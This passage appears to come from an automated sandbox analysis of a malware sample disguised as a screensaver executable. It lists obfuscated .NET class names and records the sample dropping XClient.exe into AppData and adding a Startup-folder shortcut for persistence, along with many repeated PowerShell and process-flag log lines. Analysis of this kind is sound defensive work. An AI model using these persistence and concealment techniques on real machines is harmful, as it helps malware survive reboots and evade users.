              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, aLE6e0yUoaPuqaXnZp.csHigh entropy of concatenated method names: 'lU83koOENm', 'G0d37MAwH2', 'xvl336BAp9', 'zIu3gxxhrc', 'ODQ3j69pTp', 'pqY3Y1v5Bx', 'Dispose', 'qiD4ED7MKE', 'TxJ48k9sBO', 'QMX4FGXxLg'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, TyDfo1bY3ZrsEhlwFm.csHigh entropy of concatenated method names: 'LEQ61Yhn0P', 'CM26Bd0vqB', 'x4L6viRvxg', 'gpe6dJ0JYg', 'c7A6krMkvu', 'vu66saxiV8', 'awPQbno2xCjjuEUKWs', 'PQ7Q6KOsvX2psFAINI', 'snp66h2MSF', 'gAj6SFpTdn'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, XJYgVjwL3PMpoS7ArM.csHigh entropy of concatenated method names: 'DngHiIeN65', 'avbHGrDEIl', 'MRwFNkOx5E', 'ileFhuRStQ', 'fDUFqfvROq', 'qxGFOJJKsC', 'dOUF22qm4Q', 'gyFFVbIDdG', 'ls6FMfRcZx', 'rIAFl2xQM4'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, gfpQDs6aGwak9n0C4Oi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ftyWfKZ3sv', 'YyKWoens9f', 'JqSWn4aldt', 'YsuWtZ2tR7', 'U7PWRRH0Br', 'nniWc55UHK', 'e6DWXCF90H'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, PyUexM6byOoMxTLOSna.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DETI3YPc2N', 'hs8IW3uoER', 'XChIgSciVH', 'UEOIIUa0I4', 'bj9Ij5tbNa', 'k2jIJhbn5Y', 'QFEIYiZMTs'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Udui5apYySouKBMT14.csHigh entropy of concatenated method names: 'Af1PYkPV6', 'PR4ufbV2o', 'Na8eggfVB', 'tccGmNNn0', 'Nc7U4t7ix', 'tMVwLEZKQ', 'oYfmOweGWPW0OMjSpl', 'iyUc388o7EydOdRx0F', 'wKm4rI2Eo', 'HNTWlaN5G'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, ka7sYHFqq7dPvT5nVb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gBvp0IHps2', 'koop5whEy3', 'i4upz0fhfI', 'gN0SaF6xyS', 'JsaS6EMuqE', 'LkvSprNFgW', 'PXKSSktkcR', 'cD7SiRsLfYtbOl2FpPc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, ADkFnNn5Tlm0QIaDOi.csHigh entropy of concatenated method names: 'hgoCmPpjRZ', 'dDZCUmYFEj', 'WL1CDZDgrS', 'dfRCZ0X1mJ', 'JBqChoVK5L', 'eXXCqbR7ed', 'vtbC2g5Psq', 'DNpCVx0IxH', 'S1PCljQANs', 'vhuCfdWH72'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, DjlwRxU4LiRvxgFpeJ.csHigh entropy of concatenated method names: 'pCHFuVEjIZ', 'xnmFeuCUkC', 'ek2Fmj00MP', 'UocFURHFt2', 't3OFkwu1tm', 'BmJFssUOfJ', 'NtVF7gqnt8', 'YZdF4uv1Pd', 'Ms7F3II7fa', 'et7FWFVdsM'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, XYhn0PmGM2d0vqBguD.csHigh entropy of concatenated method names: 'JtQ8txXQtR', 'MkX8RcxJUE', 'x0Z8cIuZYI', 'yt88XWNABE', 'X3F8LfmjfE', 'JIT8rT6wVS', 'DGE8y2uHYV', 'Ipb8QuLZQD', 'L8Q80gj6rM', 'A8785oPllC'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, ovuju6DaxiV8v3NgFP.csHigh entropy of concatenated method names: 'uyLAKTa90H', 'URuA8ygFvI', 'AJCAHYRQJe', 'i8fA1T3ijb', 'zK7AB23JuV', 'TcvHLQitbn', 'txCHrBsHuh', 'BYJHylSDQ4', 'H89HQpLlVu', 'TInH0T1m66'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, dnnWTVcWiOSUoMKxjl.csHigh entropy of concatenated method names: 'ToString', 'nr7sfKOZhc', 'TwDsZTlW11', 'DZYsNp51hy', 'TJCshaQDPO', 'Fj0sqbORXS', 'QBnsOIIcLO', 'HXes2yQqQd', 'VpxsVJdWTi', 'EAasMSbsYt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, bYvEAE0FmDgKllXo6e.csHigh entropy of concatenated method names: 'TOy3DY1W7g', 'UuM3ZXaJbb', 'Rk03NcH8Rw', 'wix3hMja66', 'nRj3q2bsej', 'IHD3OdBTPm', 'OCa32INt6R', 'CPA3VSwS0h', 'CTm3MLxedS', 'T0c3lobFVH'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, SCIXNr23CfXNXKcjQ5.csHigh entropy of concatenated method names: 'Yd71EfZgm2', 'rrJ1FD4ysE', 'BCj1AeD92I', 'B2CA5wg6ak', 'mL2AziwQBJ', 'nA41a74gmD', 'Daa16lWfSn', 'Wci1pHeCFn', 'MOv1SjWp4v', 'roy1b1DsEt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Ee1KgtXRbhccZ7sMGe.csHigh entropy of concatenated method names: 'Pwt7vWXGle', 'jo97d8qFRf', 'ToString', 'RLG7EeScyT', 'n0F78waNBI', 'YbH7FkR6jU', 'P8H7HeyCAC', 'c567Atw0wI', 'NX171OpfU4', 'On67BqoyTZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, a2rhWx5dUBFm60NB8M.csHigh entropy of concatenated method names: 'JLlWFBMkRs', 'TPoWHupbbU', 'SBJWAXUX5B', 'atuW1h8XUR', 'wTcW3WppBA', 'IUDWBShMY8', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.csHigh entropy of concatenated method names: 'w80SKpd1QE', 'TfvSEuZKlk', 'cpZS8Jo0N9', 'cUiSFgVcCC', 'NVrSH5NU0H', 'LiISAGMyp2', 'mF0S1Q1TxP', 'JaESBfGfOf', 'oWRST14Zsa', 'lc2SvByV4B'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, LL5idJMlpFFnUZLDnT.csHigh entropy of concatenated method names: 'gp11xAj6Si', 'qQU19ytUvk', 'kFc1PstPKN', 'rGi1uBLR44', 'oFv1infXxG', 'FXi1eVpr7C', 'Mrf1Ge0Uvy', 'QUA1mZOXne', 't3h1U2E80v', 'zNt1wipJMb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, S74R94tKMGmNqIEyqQ.csHigh entropy of concatenated method names: 'E2TklvHnD6', 'NPSkoj5LMC', 'zXfktLShOu', 'YS2kRK8YYD', 'hrYkZ6WXlr', 'PgmkNPcdH4', 's99khyeooU', 'SYmkqZAieM', 'w3TkOhBUJV', 'PsIk2ZmsVN'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, tyOgSPrRXGoq56AsYx.csHigh entropy of concatenated method names: 'Yej7QlA0E2', 'uRg75oZ2y5', 'QNN4aQDsVJ', 'M2h46V3wKe', 't0K7fhF1MS', 'TS47oE7PTJ', 'zFO7nMmpfM', 'xDg7txYso3', 'vgP7RvaWFO', 'Lch7cwRZkc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Vw7f8p8oGS4wsJPMJo.csHigh entropy of concatenated method names: 'Dispose', 'aPu60qaXnZ', 'w7dpZe7aV1', 'nUky64iXsU', 'cMk65cckeP', 'Nwj6zF1nab', 'ProcessDialogKey', 'XZppaYvEAE', 'hmDp6gKllX', 'P6eppa2rhW'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, xTGpsxZB81EqjVRX17.csHigh entropy of concatenated method names: 'EeAN11hVnuuXFa7Ot2G', 'YL7ZNWhkZTxRdPwrwNF', 'FkSA40HCZO', 'jwDA3MK0uM', 'as5AWXPAg5', 'M63C94h9imA9GPTqgpJ', 'XqJmJehIFlQXUm3WDv1'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, QxUVgL66mMgmFeb54i1.csHigh entropy of concatenated method names: 'yhnW5yudus', 'bb5WzNd6io', 'BgngaPtahW', 'oQyg6GZlLB', 'alYgp4yxbV', 'oATgSpvCUT', 'nJugbEaRNp', 'oDvgK0xmSo', 'CbggEXMi0s', 'hceg8I9FgI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, jRAAR5zRlVId4oZWmj.csHigh entropy of concatenated method names: 'fGHWe22uFx', 'KxeWme0oiu', 'kZpWUJX7B1', 'oXNWDDWrjk', 'td6WZP8pNg', 'nUYWhsSnyu', 'bV0WqLt50V', 'NajWYRGiud', 'eUhWxVmoxH', 'SFWW9lmArK'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, aLE6e0yUoaPuqaXnZp.csHigh entropy of concatenated method names: 'lU83koOENm', 'G0d37MAwH2', 'xvl336BAp9', 'zIu3gxxhrc', 'ODQ3j69pTp', 'pqY3Y1v5Bx', 'Dispose', 'qiD4ED7MKE', 'TxJ48k9sBO', 'QMX4FGXxLg'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, TyDfo1bY3ZrsEhlwFm.csHigh entropy of concatenated method names: 'LEQ61Yhn0P', 'CM26Bd0vqB', 'x4L6viRvxg', 'gpe6dJ0JYg', 'c7A6krMkvu', 'vu66saxiV8', 'awPQbno2xCjjuEUKWs', 'PQ7Q6KOsvX2psFAINI', 'snp66h2MSF', 'gAj6SFpTdn'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, XJYgVjwL3PMpoS7ArM.csHigh entropy of concatenated method names: 'DngHiIeN65', 'avbHGrDEIl', 'MRwFNkOx5E', 'ileFhuRStQ', 'fDUFqfvROq', 'qxGFOJJKsC', 'dOUF22qm4Q', 'gyFFVbIDdG', 'ls6FMfRcZx', 'rIAFl2xQM4'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, gfpQDs6aGwak9n0C4Oi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ftyWfKZ3sv', 'YyKWoens9f', 'JqSWn4aldt', 'YsuWtZ2tR7', 'U7PWRRH0Br', 'nniWc55UHK', 'e6DWXCF90H'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, PyUexM6byOoMxTLOSna.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DETI3YPc2N', 'hs8IW3uoER', 'XChIgSciVH', 'UEOIIUa0I4', 'bj9Ij5tbNa', 'k2jIJhbn5Y', 'QFEIYiZMTs'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, OEGyOZzp9CU9Z.csHigh entropy of concatenated method names: 'QYSru9RU5dJWd', 'oi9Msqd9lmqFp', 'Gh7hF3Ceyz4jK', 'x2Kcz0n4msm1l2xM', '_4hDI5T8H5DCOIm19', 'T6aFt50BZla82ZA2', 'zpcOiMJTAlF4Htxi', 'TMFXXcHHzUU18I1r', 'ZSkwZRotVkMfXhhu', 'Um2YTXt47I4LIxgc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, v5gt0V01k1MSsC0vwoxxBSwsEW4T1eqJw046P2ak3r4M2UHQ1RfEfyXqwlgDqRqjrSOTYe7.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QTea7y2A8yGbO3jMXxuYC9YMcx5anBR', 'ZTIL5yWBKqapf9Byr2X2ov4nJgGIqjf', 'WHkIaWdsBqOvjqgK5gnz3Hq7FGRo7av', 'ksvOYOxtyeEJgsYuEk2j6FJUFQEL7jb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, xEwUvc4BlwXCJ.csHigh entropy of concatenated method names: 'upuCmD95kpAQn', 'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', 'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', 'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', 'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, qMGvLJvouSdkL.csHigh entropy of concatenated method names: 'wAkM01TBZTMeC', 'ciAT4tkkLZ8RM', 'kyv1OiOaRjUOS', 'Is1Vu2C8gzfuWAcZ', 'ZrXVwJq1NPBYst66', 'YSiZ9OqRAn5DEoap', 'kpqsU8I4EmsXem6T', 'Y40LWH71GiExNonP', 'wlqe8L0mqhORb3Xh', 'cBzGfHA7YZurGUjI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 3QiiXqkghrMk1.csHigh entropy of concatenated method names: '_7TDRTDNWODVx9', 'bjpklCnAU25Ps', '_7whWzOffgktu7', 'H6OjpWJSuZpR7', 'LgXlVehbtF6PL', 'VPnNUxfUUOfKi', 'kVcqKyJkqeEYF', 'I9f9xqzndWbJy', 'Yh4ih3UMSubwZ', '_99oZuJy83I8YX'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, y42W1bnvO6P0K.csHigh entropy of concatenated method names: 'LG61tF1NXxMw5', 'oGvBieVy94qbk', 'YRTDDNA0tkzMF', 'VhxySITiopS46', 'qjbfovDtQWz1b', 'kLPAgXYZstRMB', 'hjXpfk41rTAw1', 'zs2SZYN7C9FhZ', 'zFQIATYwwABMt', 'qai42JONF5klU'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.csHigh entropy of concatenated method names: 'wcUZ2mvylwf7l', 'WtIrNy0hVmv60', 'JJgHyUlgPqlHQ', 'oHuREPEY4JElU', '_6vBzT4Nf8lYoy', 'Pai19egUGSisn', 'R5KRLNkgechqT', 'BCrPs0JGWRM5b', 'aoGqSGI44Uvct', 'irOTow0Wq5kJo'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, yI26puFLQ4OeW.csHigh entropy of concatenated method names: 'RPwrCFQWFVe3z', 'ykPv5m8mGukHt', 'rl3v1HQ21t3Ss', 'p5lTD1bRQsSns', 'N73EDMwGLrsYV', '_7giKgaxCmtum3', 'zR4TMA5bTqEsF', 'lNVI49QJGetLk', 'ivrYT9hUulqbg', 'G1GjbMsl7I84P'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
